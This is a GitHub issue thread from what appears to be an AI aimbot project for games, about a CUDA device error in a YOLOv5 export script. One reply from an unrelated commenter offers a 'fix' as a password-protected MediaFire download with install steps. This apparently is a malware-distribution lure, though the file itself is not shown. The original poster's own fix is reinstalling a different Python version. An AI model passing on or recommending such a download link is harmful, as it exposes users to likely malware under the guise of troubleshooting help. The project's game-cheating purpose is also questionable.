### ISSUE TITLE
AssertionError: Invalid CUDA '--device 0'

### ISSUE THREAD

**Issue by RyGuyFPS** [RootKit-Org/AI-Aimbot#197]
C:\Users\.\OneDrive\Desktop\yolov5-master\yolov5-master>python .\export.py --weights ./yolov5x-seg.engine --include engine --half --imgsz 320 320 --device 0
export: data=C:\Users\.\OneDrive\Desktop\yolov5-master\yolov5-master\data\coco128.yaml, weights=['./yolov5x-seg.engine'], imgsz=[320, 320], batch_size=1, device=0, half=True, inplace=False, keras=False, optimize=False, int8=False, per_tensor=False, dynamic=False, simplify=False, mlmodel=False, opset=17, verbose=False, workspace=4, nms=False, agnostic_nms=False, topk_per_class=100, topk_all=100, iou_thres=0.45, conf_thres=0.25, include=['engine']
Traceback (most recent call last):
  File "C:\Users\.\OneDrive\Desktop\yolov5-master\yolov5-master\export.py", line 1540, in <module>
    main(opt)
  File "C:\Users\.\OneDrive\Desktop\yolov5-master\yolov5-master\export.py", line 1535, in main
    run(**vars(opt))
  File "C:\Users\.\AppData\Roaming\Python\Python311\site-packages\torch\utils\_contextlib.py", line 116, in decorate_context
    return func(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\.\OneDrive\Desktop\yolov5-master\yolov5-master\export.py", line 1377, in run
    device = select_device(device)
             ^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\.\OneDrive\Desktop\yolov5-master\yolov5-master\utils\torch_utils.py", line 124, in select_device
    assert torch.cuda.is_available() and torch.cuda.device_count() >= len(
                                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
AssertionError: Invalid CUDA '--device 0' requested, use '--device cpu' or pass valid CUDA device(s)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by RyGuyFPS** [comment]
Fixed*
uninstall everything
then install python 3.11.0
not python 3.11.6
